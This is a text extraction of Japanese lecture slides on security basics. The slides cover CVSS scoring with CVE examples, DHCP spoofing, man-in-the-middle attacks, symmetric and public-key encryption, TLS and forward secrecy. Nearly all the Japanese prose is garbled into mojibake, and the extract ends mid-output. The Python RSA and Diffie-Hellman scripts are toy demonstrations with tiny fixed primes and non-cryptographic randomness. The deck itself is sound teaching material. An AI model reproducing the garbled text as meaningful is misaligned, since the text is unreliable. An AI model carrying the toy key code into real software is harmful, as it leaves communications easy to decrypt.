    ߈ܸ৚݅ͷෳࡶ͞(Access Complexity)
    ߈ܸͰ͖Δঢ়ଶʹ͢Δͷ͸೉͍͔͠
    ಛผͳઃఆ͕࢖ΘΕͯΔ͚࣌ͩ ࣄલʹԿ͔Λ஌͍ͬͯΔඞཁ͕͋Δ

    ඞཁͳಛݖϨϕϧ(Privileges Required)
    ߈ܸΛߦ͏ʹ͸Ͳͷఔ౓ͷݖݶ͕ඞཁ͔
    ҰൠϢʔβݖݶ͕ඞཁ ؅ཧऀݖݶ͕ඞཁ

    View Slide

  130. جຊධՁج४ (Base Metrics)
    Ϣʔβؔ༩Ϩϕϧ(User Interaction)
    ߈ܸΛ੒ཱͤ͞ΔͨΊʹਖ਼نͷϢʔβʹԿ͔Λͤ͞Δඞཁ͕͋Δ͔
    ࡉ޻Λͨ͠8FCϖʔδΛ։͔ͤΔඞཁ͕͋Δ

    είʔϓ(Scope)
    ߈ܸΛड͚ͨίϯϙʔωϯτҎ֎΁ͷ߈ܸͷ଍͕͔Γʹ͞ΕΔՄೳੑ͕͋Δ͔
    ΫϩεαΠτεΫϦϓςΟϯάͳͲ͕͜Εʹ֘౰͢Δ

    View Slide

  131. جຊධՁج४ (Base Metrics)
    ׬શੑ΁ͷӨڹ(Integrity Impact)
    ߈ܸऀ͸ର৅ͷ৘ใΛվ᜵Ͱ͖Δ͔
    վ᜵Ͱ͖Δ৘ใͷதʹػີ৘ใ͸ؚ·ΕಘΔ

    Մ༻ੑ΁ͷӨڹ(Availability Impact)
    ߈ܸऀ͸αʔϏεΛఀࢭͤ͞Δࣄ͕Ͱ͖Δ͔
    Ұ෦ͷػೳΛఀࢭͤ͞Δ͜ͱ͕Ͱ͖Δ ׬શʹఀࢭͤ͞Δ͜ͱ͕Ͱ͖Δ

    ػີੑ΁ͷӨڹ(Confidentiality Impact)
    ߈ܸऀʹݟ͑ͯ͸͍͚ͳ͍৘ใ͕ݟ͑ͯ͠·͏͔
    ݟ͑ͯ͠·͏৘ใͷதʹػີ৘ใ͸ؚ·ΕಘΔ

    View Slide

  132. ͜͜ʹ
    $7&ͷ$744ΛషΔ
    Apach httpdͷ੬ऑੑCVE-2017-9798ͷ৔߹
    ωοτϫʔΫӽ͠ʹ߈ܸͰ͖Δ
    ߈ܸ͸؆୯
    ߈ܸʹݖݶ͸ಛʹඞཁͳ͠
    ϢʔβʹԿ͔ͤ͞Δඞཁ΋ͳ͠
    Αͦ΁ͷ߈ܸͷ଍͕͔Γʹ͸ͳΒͳ͍
    ػີ৘ใ͕࿙ΕΔ
    ৘ใͷվ͟Μ͸Ͱ͖ͳ͍
    Մ༻ੑΛଛͶΔ͜ͱ͸Ͱ͖ͳ͍
    ۓٸ౓: 7.5/10.0 (ߴ)
    ݁ߏϠό͍΍ͭͳΜͰૣ͍ͱ͜࠹͍Ͱ͓͜͏
    https://nvd.nist.gov/vuln/detail/CVE-2017-9798

    View Slide

  133. ͜͜ʹ
    $7&ͷ$744ΛషΔ
    BINDͷ੬ऑੑCVE-2016-2776ͷ৔߹
    ωοτϫʔΫӽ͠ʹ߈ܸͰ͖Δ
    ߈ܸ͸؆୯
    ߈ܸʹݖݶ͸ಛʹඞཁͳ͠
    ϢʔβʹԿ͔ͤ͞Δඞཁ΋ͳ͠
    Αͦ΁ͷ߈ܸͷ଍͕͔Γʹ͸ͳΒͳ͍
    ৘ใ͸࿙Εͳ͍
    ৘ใͷվ͟Μ͸Ͱ͖ͳ͍
    Մ༻ੑΛ׬શʹଛͶΔࣄ͕Ͱ͖Δ
    ۓٸ౓: 7.5/10.0 (ߴ)
    ݁ߏϠό͍΍ͭͳΜͰૣ͍ͱ͜࠹͍Ͱ͓͜͏
    https://nvd.nist.gov/vuln/detail/CVE-2016-2776

    View Slide

  134. ͜͜ʹ
    $7&ͷ$744ΛషΔ
    Firefoxͷ੬ऑੑCVE-2016-5253ͷ৔߹
    ϩʔΧϧ͔Β߈ܸͰ͖Δ
    ߈ܸ͸؆୯Ͱ͸ͳ͍
    ҰൠϢʔβݖݶ͕ཁΔ
    ϢʔβʹԿ͔ͤ͞Δඞཁ͸ͳ͠
    Αͦ΁ͷ߈ܸͷ଍͕͔Γʹ͸ͳΒͳ͍
    ৘ใ͸࿙Εͳ͍
    ػີ৘ใͷվ͟Μ͕Ͱ͖Δ
    Մ༻ੑΛଛͶΔࣄ͸Ͱ͖ͳ͍
    ۓٸ౓: 4.7/10.0 (த)
    ੬ऑੑʹ͸ҧ͍ͳ͍͚ͲϠό͍΍ͭͰ͸ͳͦ͞͏
    https://nvd.nist.gov/vuln/detail/CVE-2016-5253

    View Slide

  135. ͜͜ʹ
    SFEIBUͷ੬ऑੑ৘ใͷϖʔδΛషΔ
    ۓٸ౓ͷߴ͍੬ऑੑ͕ݟ͔ͭΔͱ֤σΟετϦϏϡʔγϣϯ͔Β
    Ͳ͏͢Ε͹࠹͛Δ͔ʹؔ͢Δ৘ใ͕ग़Δ
    https://access.redhat.com/security/cve/cve-2016-2776 https://security-tracker.debian.org/tracker/CVE-2016-2776
    ͜͜ʹ
    EFCJBOͷ੬ऑੑ৘ใͷϖʔδΛషΔ

    View Slide

  136. ࢖͍ͬͯΔιϑτ΢ΣΞͷ੬ऑੑʹCVE ID͕ৼΒΕͨ
    ͦͷIDʹ͍ͭͯৄࡉ͕ग़͍ͯͳ͍͔άάΖ͏
    ࢖͍ͬͯΔιϑτ΢ΣΞͷ੬ऑੑͷৄࡉ͕ग़͍ͯͨ
    CVSSΛݟͯӨڹΛධՁ͠Α͏
    σΟετϦ͔Βਂࠁͳ੬ऑੑͷमਖ਼͕ͳ͔ͳ͔ग़ͳ͍
    ੬ऑੑͷৄࡉΛݟͯ
    ໰୊ͷػೳΛආ͚ͯαʔϏεΛఏڙͰ͖ͳ͍͔ݕ౼͠Α͏
    σΟετϦ͔Βਂࠁͳ੬ऑੑͷमਖ਼͕ग़ͨ
    ૣٸʹΞοϓσʔτ͠Α͏

    View Slide

  137. ௨৴ʹର͢Δ߈ܸʹඋ͑Δ

    View Slide

  138. 8J'J
    Πϯλʔωοτ ઀ଓઌ
    ϗςϧͷWiFiΞΫηεϙΠϯτʹ઀ଓ͠·͢
    Alice

    View Slide

  139. 8J'J
    Πϯλʔωοτ ઀ଓઌ
    ϗςϧͷWiFiΞΫηεϙΠϯτʹ઀ଓ͠·͢
    ֎ʹग़Δʹ͸
    Ͳ͜ʹ௨৴Λ౤͛Ε͹
    ྑ͍Ͱ͔͢
    ͦΕ͸
    DHCP DISCOVER
    ѱҙ͋Δୈࡾऀ
    ͬͪͩ͜Α
    DHCP OFFER
    Alice

    View Slide

  140. 8J'J
    Πϯλʔωοτ ઀ଓઌ
    ϗςϧͷWiFiΞΫηεϙΠϯτʹ઀ଓ͠·͢
    ѱҙ͋Δୈࡾऀ
    σʔλͷྲྀΕ
    ͜ͷΑ͏ͳ߈ܸ͸DHCPεϓʔϑΟϯάͱݺ͹ΕΔ
    Alice

    View Slide

  141. ѱҙ͋Δୈࡾऀ͕ؒʹڬ·Δํ๏͸͍͔ͭ͋͘Δ͕
    ઀ଓઌ͔Β͜͏ͨ͠ঢ়ଶΛະવʹ๷͙ज़͸ແ͍ͨΊ
    ΠϯλʔωοτΛհͨ͠௨৴͸
    ؒʹѱҙ͋Δୈࡾऀ͕͍Δ΋ͷͱͯ͠
    ௨৴Λߦ͏ඞཁ͕͋Δ

    View Slide

  142. Πϯλʔωοτ͸఻ݴήʔϜͩ
    ԕ͘ͷϗετʹͨͲΓணͨ͘Ίʹ͸
    ͨ͘͞ΜͷϗετΛܦ༝͢ΔՄೳੑ͕͋Δ
    ઀ଓઌ
    ܦ༝ͨ͠ϗετͷ਺Λhop਺ͱݺͿ
    1hop 2hop 3hop 4hop 5hop

    View Slide

  143. Πϯλʔωοτ͸఻ݴήʔϜͩ
    ௨৴ܦ࿏্ʹ͋Δશͯͷϗετʹ͸
    ௨৴಺༰ؙ͕ݟ͑Ͱ͋Δ
    ઀ଓઌ

    View Slide

  144. Πϯλʔωοτ͸఻ݴήʔϜͩ
    ௨৴ܦ࿏্ͷѱҙ͋Δୈࡾऀ͸
    ࣍ͷϗετʹਖ਼͘͠௨৴಺༰Λ఻͑ͳ͍͔΋͠Εͳ͍
    ઀ଓઌ

    View Slide

  145. Πϯλʔωοτ͸఻ݴήʔϜͩ
    ௨৴ܦ࿏্ͷѱҙ͋Δୈࡾऀ͸
    ຊདྷͷ௨৴૬खʹͳΓ͢·͔͢΋͠Εͳ͍
    Bob
    Bob͞ΜͰ͔͢ ͸͍Bob͞ΜͰ͢
    Charlie
    Alice

    View Slide

  146. ܦ࿏্ͷѱҙ͋Δୈࡾऀͷ
    ӨڹΛड͚ͳ͍ͨΊʹ͸
    ௨৴಺༰Λ҉߸Խ
    ௨৴಺༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ

    View Slide

  147. ڞ௨伴҉߸
    H e l l o , sp W o r l d ! nl
    48 65 6c 6c 6f 2c 20 57 6f 72 6c 64 21 0a
    m 8 can dc1 si vt n 9 n del : syn M f R +
    ed 38 98 11 8f 0b 6e 39 6e ff ba 16 4d e6 52 2b
    H e l l o , sp W o r l d ! nl
    48 65 6c 6c 6f 2c 20 57 6f 72 6c 64 21 0a
    伴Λ࢖ͬͯม׵
    伴Λ࢖ͬͯٯม׵
    ͲͷΑ͏ʹม׵͢Δ͔ʹҧ͍͕͋Δ
    ෳ਺ͷ҉߸ΞϧΰϦζϜ͕ଘࡏ͢Δ

    View Slide

  148. ྑ͍ڞ௨伴҉߸ͱ͸
    ݱ࣮తͳ࣌ؒͰશͯͷ伴Λࢼ͢͜ͱ͕Ͱ͖ͣ
    શͯͷ伴Λࢼ͢ΑΓޮ཰ͷྑ͍ղಡํ๏͕ଘࡏ͠ͳ͍
    ͜ΕΛূ໌͢Δͷ͕ࠔ೉
    ͜Ε͸伴Λ௕͘͢Ε͹࣮ݱͰ͖Δ

    View Slide

  149. ΞϧΰϦζϜ͕޿͘ར༻͞Ε͍ͯͯ
    ͦΕͰ΋ޮ཰ͷྑ͍ղಡํ๏͕ൃݟ͞Ε͍ͯͳ͍҉߸͸
    গͳ͘ͱ΋ࠓͷͱ͜Ζ͸҆શͰ͋Δͱߟ͑ΒΕΔ
    ҉߸ΞϧΰϦζϜΛࣗ࡞͢Δͱ
    ͜ͷ෦෼Λຬͨ͢ͷ͕ࠔ೉ʹͳΔ
    ∴҉߸ΞϧΰϦζϜͷࣗ࡞͸ΦεεϝͰ͖ͳ͍
    ্هͷ৚݅Λຬͨ͢
    طଘͷ҉߸ΞϧΰϦζϜΛ࠾༻͠Α͏

    View Slide

  150. ݱ࣮తͳ࣌ؒͰશͯͷ伴Λࢼ͢͜ͱ͕Ͱ͖ͣ
    ޿͘ར༻͞Ε͍ͯΔ͚Ͳ
    ޮ཰ͷྑ͍ղಡํ๏͕ݟ͔͍ͭͬͯͳ͍ڞ௨伴҉߸
    Advanced Encryption Standard (AES)
    Blowfish
    ͳͲͳͲ
    ϒϩοΫ҉߸
    ετϦʔϜ҉߸
    Chacha20

    View Slide

  151. ڞ௨伴҉߸ͷ伴഑ૹ໰୊
    ҉߸Λ΍ΓऔΓ͢ΔͨΊʹ͸伴͕ඞཁ
    ͔͠͠҉߸Խͱ෮߸ʹಉ͡伴Λ࢖͍ͬͯΔ৔߹
    ౪ௌͷՄೳੑ͕͋Δ௨৴खஈΛ࢖ͬͯ૬खʹ伴Λ౉ͤͳ͍
    ѱҙ͋Δୈࡾऀʹ伴͕όϨ͍ͯͨΒ
    ҉߸ͷҙຯ͕ͳ͍ Bob
    Alice

    View Slide

  152. ܦ࿏্ͷѱҙ͋Δୈࡾऀͷ
    ӨڹΛड͚ͳ͍ͨΊʹ͸
    ௨৴಺༰Λ҉߸Խ
    ௨৴಺༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ
    ѱҙ͋ΔୈࡾऀʹόϨͳ͍Α͏ʹ҉߸伴Λڞ༗
    NEW!

    View Slide

  153. ެ։伴҉߸
    ୭͔͕ެ։伴Λ౪ௌ͍ͯͨ͠ͱͯ͠΋
    ͦͷ伴Ͱ௨৴಺༰Λ෮߸͢Δ͜ͱ͸Ͱ͖ͳ͍
    ෮߸͢Δͷʹඞཁͳ
    ൿີ伴
    ͸ଞਓʹڭ͑ͳ͍
    ҉߸Խͱ෮߸ʹҟͳΔ伴Λ࢖͏҉߸ΞϧΰϦζϜ
    ҉߸Խʹඞཁͳ
    ެ։伴
    Λ௨৴૬खʹૹΔ
    ௨৴૬ख͸ެ։伴Λ࢖ͬͯ
    伴ͷओʹૹΓ͍ͨϝοηʔδΛ҉߸Խ͢Δ

    View Slide

  154. ެ։伴҉߸
    =15
    =-15 =42
    =57
    42+15=57
    57-15=42
    ͜Μͳ҉߸ͩͱ
    ҰॠͰެ։伴͔Βൿີ伴͕όϨͯ͠·͏
    ൿີ伴͔Βެ։伴͸؆୯ʹ࡞Εͳ͚Ε͹ͳΒͳ͍͕
    ެ։伴͔Βൿີ伴͸༰қʹ࡞Εͯ͸ͳΒͳ͍

    View Slide

  155. RSA
    ൿີ伴͔Βެ։伴͸؆୯ʹ࡞Εͳ͚Ε͹ͳΒͳ͍͕
    ެ։伴͔Βൿີ伴͸༰қʹ࡞Εͯ͸ͳΒͳ͍
    373*61=22753Ͱ͋Δ͜ͱ͸؆୯ʹٻ·Δ͕
    22753͕373ͱ61ʹ෼ղͰ͖Δ͜ͱΛ
    ಉ͘͡Β͍؆୯ʹٻΊΔํ๏͸஌ΒΕ͍ͯͳ͍
    ૉҼ਺෼ղ͕ඞཁ
    ͜ͷΑ͏ʹܭࢉྔ͕ରশͰͳ͍ܭࢉΛڬΜͰ伴Λ࡞Δ͜ͱͰ
    ެ։伴͔Βൿີ伴Λ࡞Ζ͏ͱ͢Δͱ
    ๲େͳܭࢉ͕ඞཁʹͳΔΑ͏ͳ伴Λ࡞ΕΔ

    View Slide

  156. #!/usr/bin/env python3
    # -*- coding: utf-8 -*-
    def egcd( x, y, a = 0, b = 1 ):
    div, mod = divmod( x, y )
    if mod == 0:
    return ( y, a )
    return egcd( y, mod, b - div * a, a )
    def modinv( x, y ):
    a, b = egcd( x, y )
    if a != 1:
    raise Exception( 'no modinv')
    return b % y
    def generate_key_pair():
    prime_nums = [ 116903, 215443, 139721 ]
    public_key = [ prime_nums[ 0 ] * prime_nums[ 1 ], prime_nums[ 2 ] ]
    private_key = modinv( public_key[ 1 ], ( prime_nums[ 0 ] - 1 ) * ( prime_nums[ 1 ] - 1 ) )
    return ( public_key, private_key )
    public_key, private_key = generate_key_pair();
    print( 'ൿີ伴:\t%d' % private_key )
    print( 'ެ։伴:\t%d,%d' % ( public_key[ 0 ], public_key[ 1 ] ) )
    plain = 0x686f6765
    print( 'ݪจ:\t%X' % plain )
    crypted = pow( plain, public_key[ 1 ], public_key[ 0 ] )
    print( '҉߸Խ:\t%X' % crypted )
    decrypted = pow( crypted, private_key, public_key[ 0 ] )
    print( '෮߸:\t%X' % decrypted )
    $ ./crypto.py
    ൿີ伴: 15753325457
    ެ։伴: 25185933029,139721
    ݪจ: 686F6765
    ҉߸Խ: 2779B8996
    ෮߸: 686F6765
    RSA

    View Slide

  157. def egcd( x, y, a = 0, b = 1 ):
    div, mod = divmod( x, y )
    if mod == 0:
    return ( y, a )
    return egcd( y, mod, b - div * a, a )
    def modinv( x, y ):
    a, b = egcd( x, y )
    if a != 1:
    raise Exception( 'no modinv')
    return b % y
    def generate_key_pair():
    prime_nums = [ 116903, 215443, 139721 ]
    public_key = [ prime_nums[ 0 ] * prime_nums[ 1 ], prime_nums[ 2 ] ]
    private_key = modinv( public_key[ 1 ], ( prime_nums[ 0 ] - 1 ) * ( prime_nums[ 1 ] - 1 ) )
    return ( public_key, private_key )
    public_key, private_key = generate_key_pair();
    print( 'ൿີ伴:\t%d' % private_key )
    print( 'ެ։伴:\t%d,%d' % ( public_key[ 0 ], public_key[ 1 ] ) )
    plain = 0x686f6765
    print( 'ݪจ:\t%X' % plain )
    crypted = pow( plain, public_key[ 1 ], public_key[ 0 ] )
    print( '҉߸Խ:\t%X' % crypted )
    decrypted = pow( crypted, private_key, public_key[ 0 ] )
    print( '෮߸:\t%X' % decrypted )
    $ ./crypto.py
    ൿີ伴: 15753325457
    ެ։伴: 25185933029,139721
    ݪจ: 686F6765
    ҉߸Խ: 2779B8996
    ෮߸: 686F6765
    RSA
    ͋Δ੔਺nͱૉͳ1Ҏ্nະຬͷ
    ࣗવ਺ͷ਺ΛٻΊΔؔ਺Λ
    ΦΠϥʔͷτʔγΣϯτؔ਺φ(n)ͱݺͿ
    ૉ਺ͷఆٛΑΓn͕ૉ਺ͷ৔߹φ(n)͸n-1ʹͳΔ
    φ(ab)=φ(a)φ(b)ʹͳΔ͜ͱ͕஌ΒΕ͍ͯΔ
    aͱbΛ஌͍ͬͯΔͱφ(ab)͸ఆ਺࣌ؒͰٻ·Δ͕
    ab͔͠Θ͔Βͳ͍৔߹φ(ab)͸ࢦ਺࣌ؒΛཁ͢Δ
    ͜ͷඇରশੑΛ࢖ͬͯެ։伴͔Βൿີ伴ΛٻΊΔͷΛࠔ೉ʹ͢Δ

    View Slide

  158. ެ։伴ΛૉҼ਺෼ղ͢Ε͹ൿີ伴ʹͨͲΓண͚Δ
    ༰қͰ͸ͳ͍͕
    ૯౰ͨΓͰ伴Λ୳͢ΑΓ͸୹࣌ؒͰߦ͑ͯ͠·͏

    View Slide

  159. ૉҼ਺෼ղ͸େ͖ͳ਺ʹͳΔఔܭࢉʹ͕͔͔࣌ؒΔ
    ݱ࣮తͳ࣌ؒͰܭࢉͰ͖ͳ͍Α͏ͳେ͖ͳ਺Λ伴ͱ͢Δ͜ͱͰ
    ൿີ伴͕όϨΔͷΛ๷͙
    RSAͷ৔߹伴௕768bitҎԼͷ΋ͷ͸
    ݱ࣮తͳ࣌ؒͰൿີ伴͕ٻ·ͬͯ͠·͏ࣄ͕஌ΒΕ͍ͯΔ
    ͜ͷΑ͏ͳݹ͍伴͸ΑΓ௕͍伴ʹߋ৽͠ͳ͚Ε͹ͳΒͳ͍
    ެ։伴҉߸ͷ伴௕͸ૉҼ਺෼ղʹ͔͔Δ࣌ؒͰܾΊΔ

    View Slide

  160. Bob
    Charlie
    தؒऀ߈ܸ
    ѱҙ͋Δୈࡾऀͱ҆શʹ௨৴Ͱ͖ΔΑ͏ʹͳͬͯ͠·ͬͨ!
    Bob͞ΜͰ͔͢ ͸͍Bob͞ΜͰ͢
    ௨৴૬ख͕ຊ෺Ͱ͋Δ͜ͱΛ͔֬Ίͳ͚Ε͹ͳΒ͍

    View Slide

  161. ܦ࿏্ͷѱҙ͋Δୈࡾऀͷ
    ӨڹΛड͚ͳ͍ͨΊʹ͸
    ௨৴಺༰Λ҉߸Խ
    ௨৴૬ख͕ຊ෺͔Ͳ͏͔֬ೝ
    ௨৴಺༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ
    ѱҙ͋ΔୈࡾऀʹόϨͳ͍Α͏ʹ҉߸伴Λڞ༗
    NEW!

    View Slide

  162. Bob
    ೝূہ
    BobຊਓͰ͋Δ͜ͱΛ
    ෺ཧతͳํ๏Ͱ֬ೝͯ͠
    ൿີ伴Λൃߦ
    ެ։伴Λऔಘ
    αʔόূ໌ॻ
    ެ։伴Λ࢖ͬͯ҉߸Խͨ͠σʔλ͸
    ຊ෺ͷBob͚͕ͩಡΊΔ
    ԿΒ͔ͷཧ༝ͰBobͷൿີ伴͕
    ଞਓͷखʹ౉ͬͯ͠·ͬͨ৔߹
    ೝূہ͸ͦͷ伴Λࣦޮͤ͞Δ

    View Slide

  163. Transport Layer Security
    ུͯ͠TLS ੲ͸SSLͱݺ͹Ε͍ͯͨ
    ͜ΕΒͷػೳΛ࣋ͬͨ௨৴࿏Λ࡞ΔͨΊͷن֨
    RFCͰඪ४Խ[1]͞Ε͓ͯΓOpenSSLͳͲͷ࣮૷͕ଘࡏ͢Δ
    ࣌୅ͱͱ΋ʹ҆શͳ҉߸͸มΘΔͨΊTLS͸༷ʑͳ҉߸ٕज़Λαϙʔτ͍ͯ͠Δ
    [1] https://www.ietf.org/rfc/rfc5246.txt
    ௨৴಺༰Λ҉߸Խ
    ௨৴૬ख͕ຊ෺͔Ͳ͏͔֬ೝ
    ௨৴಺༰͕վ͟Μ͞Ε͍ͯͳ͍͔ݕূ
    ѱҙ͋ΔୈࡾऀʹόϨͳ͍Α͏ʹ҉߸伴Λڞ༗

    View Slide

  164. Transport Layer Security
    ෺ཧ૚
    σʔλϦϯΫ૚
    TCP/IP
    ௨৴Λߦ͏ΞϓϦέʔγϣϯ
    TLS
    TLSΛ࢖͏ΞϓϦέʔγϣϯ͸
    TLSʹ௨৴σʔλΛ౉͢
    TLS͸௨৴૬खͷ֬ೝɺ伴ڞ༗Λߦ͍
    ҉߸Խͯ͠ϋογϡΛ͚ͭͨσʔλΛ
    TCP/IPͷιέοτʹྲྀ͢
    TLSͷ্ʹΞϓϦέʔγϣϯΛ࡞ΔࣄͰ
    ҉߸ʹؔ͢Δ໘౗ࣄΛ
    ࣗ෼Ͱ࣮૷͢Δඞཁ͕ͳ͘ͳΔ

    View Slide

  165. RSAΛ༻͍ͨTLS
    ެ։伴Λऔಘ
    nΛެ։伴Ͱ҉߸Խͯ͠౉͢
    ͋Δཚ਺nΛ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    ڞ௨伴҉߸Ͱ
    ҉߸Խ͞Εͨ௨৴
    ༗ޮͳެ։伴Ͱ҉߸Խͨ͠஋Λ྆ऀͰڞ༗Ͱ͖ͨͱ͍͏͜ͱ͸
    ڞ௨伴͸ҙਤͨ͠௨৴૬खͷΈͱڞ༗͞Εͨঢ়ଶʹ͋Δ
    ຊ෺ͷ௨৴૬ख͸
    ൿີ伴Ͱ
    nΛऔΓग़ͤΔ
    Bob
    Alice

    View Slide

  166. RSAΛ༻͍ͨTLS
    औಘ
    nΛެ։伴Ͱ҉߸Խͯ͠౉͢
    ͋Δཚ਺nΛ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    ڞ௨伴҉߸Ͱ
    ҉߸Խ͞Εͨ௨৴
    ͜ͷ࣌ͷ௨৴Λه࿥͍ͯ͠Δୈࡾऀ͕͍ͨͱ͢Δ
    ͜ͷ࣌఺Ͱ͸ڞ௨伴҉߸ͷ伴΋ൿີ伴΋Θ͔Βͳ͍ͨΊ
    ୈࡾऀ͸௨৴ͷ಺༰Λ஌Δ͜ͱ͕Ͱ͖ͳ͍
    Bob
    Alice

    View Slide

  167. nΛެ։伴Ͱ҉߸Խͯ͠౉͢
    ͋Δཚ਺nΛ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    ڞ௨伴҉߸Ͱ
    ҉߸Խ͞Εͨ௨৴
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    ͦͷޙԿΒ͔ͷཧ༝Ͱൿີ伴͕ެʹͳΔͱ
    ୈࡾऀ͸อଘ͓͍ͯͨ͠௨৴಺༰͔Β
    ڞ௨伴ΛऔΓग़ͯ͠
    શͯͷ௨৴಺༰Λ஌Δ͜ͱ͕Ͱ͖Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ

    View Slide

  168. nΛެ։伴Ͱ҉߸Խͯ͠౉͢
    ͋Δཚ਺nΛ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    ڞ௨伴҉߸Ͱ
    ҉߸Խ͞Εͨ௨৴
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    ϑΥϫʔυηΩϡϦςΟ
    ௨৴͕ߦΘΕͨޙͰαʔόূ໌ॻͷൿີ伴͕όϨͯ΋
    ͦΕ·ͰʹߦΘΕͨ௨৴಺༰͕όϨͳ͍Α͏ʹ͢Δ͜ͱ
    RSAͰڞ༗伴ͷૉΛ௨৴૬खʹૹΔͱ
    ϑΥϫʔυηΩϡϦςΟΛ࣮ݱͰ͖ͳ͍
    ͦͷޙԿΒ͔ͷཧ༝Ͱൿີ伴͕ެʹͳΔͱ
    ୈࡾऀ͸อଘ͓͍ͯͨ͠௨৴಺༰͔Β
    ڞ௨伴ΛऔΓग़ͯ͠
    શͯͷ௨৴಺༰Λ஌Δ͜ͱ͕Ͱ͖Δ

    View Slide

  169. ཭ࢄର਺໰୊
    G = xa mod p (ͨͩ͠p͸ૉ਺Ͱ 2 ≦ a < p)
    ͜ͷΑ͏ͳࣜʹ͓͍ͯ
    xͱaͱp͔ΒG͸ର਺࣌ؒͰٻ·Δ͕
    xͱGͱp͔ΒaΛٻΊΔʹ͸ࢦ਺࣌ؒΛཁ͢Δ
    ಛʹp͕ڊେͳૉ਺ͷ৔߹
    aΛݱ࣮తͳ࣌ؒͰٻΊΒΕͳ͘ͳΔ

    View Slide

  170. Diffie-Hellman伴ڞ༗
    G = xa mod p (ͨͩ͠p͸ૉ਺Ͱ 2 ≦ a < p)
    ͜ͷΑ͏ͳࣜʹ͓͍ͯ
    xͱaͱp͔ΒG͸ର਺࣌ؒͰٻ·Δ͕
    xͱGͱp͔ΒaΛٻΊΔʹ͸ࢦ਺࣌ؒΛཁ͢Δ
    ͜ͷඇରশੑΛ࢖ͬͯ௨৴ܦ࿏্ʹݟ͑Δ৘ใ͚ͩͰ͸
    ༰қʹ伴ΛٻΊΒΕͳ͍Α͏ʹ͢Δ
    ಛʹp͕ڊେͳૉ਺ͷ৔߹
    aΛݱ࣮తͳ࣌ؒͰٻΊΒΕͳ͘ͳΔ

    View Slide

  171. Diffie-Hellman伴ڞ༗
    ͋Δཚ਺aΛ࡞Δ ͋Δཚ਺bΛ࡞Δ
    Ga = xa mod p Gb = xb mod p
    n = Gba mod p n = Gab mod p
    n͸ͲͪΒͷܭࢉํ๏Ͱ΋
    ಉ͡஋ʹͳΔ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    nΛ΋ͱʹ
    ڞ௨伴Λ࡞Δ
    ͜͜Ͱަ׵͞ΕΔGa Gb
    ͔Β
    aͱbΛ஌Δࣄ͸Ͱ͖ͳ͍

    View Slide

  172. #!/usr/bin/env python3
    # -*- coding: utf-8 -*-
    import random
    random.seed()
    # pͱx͸ࣄલʹ௨৴૬खͱڞ༗͓ͯ͘͠ = ౪ௌऀʹݟ͑Δ
    p=152219 # ೚ҙͷૉ਺
    x=2 # 2Ҏ্pະຬͷ೚ҙͷࣗવ਺
    # ͜ͷ஋͸௨৴ʹ৐ͤͳ͍ = ౪ௌऀʹݟ͑ͳ͍
    secret1=random.randint(2,p)
    secret2=random.randint(2,p)
    print( u'Alice͕࡞ͬͨൿີͷ஋: %d' % secret1 )
    print( u'Bob͕࡞ͬͨൿີͷ஋: %d' % secret2 )
    # ͜ͷ஋͸௨৴Ͱ૬खʹ౉͢ = ౪ௌऀʹݟ͑Δ
    public1=pow( x, secret1, p )
    public2=pow( x, secret2, p )
    print( u'Alice͔ΒBobʹૹΔ஋: %d' % public1 )
    print( u'Bob͔ΒAliceʹૹΔ஋: %d' % public2 )
    # ͜ͷ஋͕Ұக͢Δ
    key1=pow( public2, secret1, p )
    key2=pow( public1, secret2, p )
    print( u'Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key1 )
    print( u'Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key2 )
    Diffie-Hellman伴ڞ༗
    $ ./dh.py
    Alice͕࡞ͬͨൿີͷ஋: 118909
    Bob͕࡞ͬͨൿີͷ஋: 89005
    Alice͔ΒBobʹૹΔ஋: 26981
    Bob͔ΒAliceʹૹΔ஋: 123319
    Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243
    Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: 7243

    View Slide

  173. #!/usr/bin/env python3
    # -*- coding: utf-8 -*-
    import random
    random.seed()
    # pͱx͸ࣄલʹ௨৴૬खͱڞ༗͓ͯ͘͠ = ౪ௌऀʹݟ͑Δ
    p=152219 # ೚ҙͷૉ਺
    x=2 # 2Ҏ্pະຬͷ೚ҙͷࣗવ਺
    # ͜ͷ஋͸௨৴ʹ৐ͤͳ͍ = ౪ௌऀʹݟ͑ͳ͍
    secret1=random.randint(2,p)
    secret2=random.randint(2,p)
    print( u'Alice͕࡞ͬͨൿີͷ஋: %d' % secret1 )
    print( u'Bob͕࡞ͬͨൿີͷ஋: %d' % secret2 )
    # ͜ͷ஋͸௨৴Ͱ૬खʹ౉͢ = ౪ௌऀʹݟ͑Δ
    public1=pow( x, secret1, p )
    public2=pow( x, secret2, p )
    print( u'Alice͔ΒBobʹૹΔ஋: %d' % public1 )
    print( u'Bob͔ΒAliceʹૹΔ஋: %d' % public2 )
    # ͜ͷ஋͕Ұக͢Δ
    key1=pow( public2, secret1, p )
    key2=pow( public1, secret2, p )
    print( u'Alice͕Bob͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key1 )
    print( u'Bob͕Alice͔Β໯ͬͨ஋Ͱ࡞ͬͨ஋: %d' % key2 )
    Diffie-Hellman伴ڞ༗
    $ ./dh.py
    Alice͕࡞ͬͨൿີͷ஋: 118909
    Bob͕࡞ͬͨൿີͷ஋: 89005
    Alice͔ΒBobʹૹΔ஋: 26981
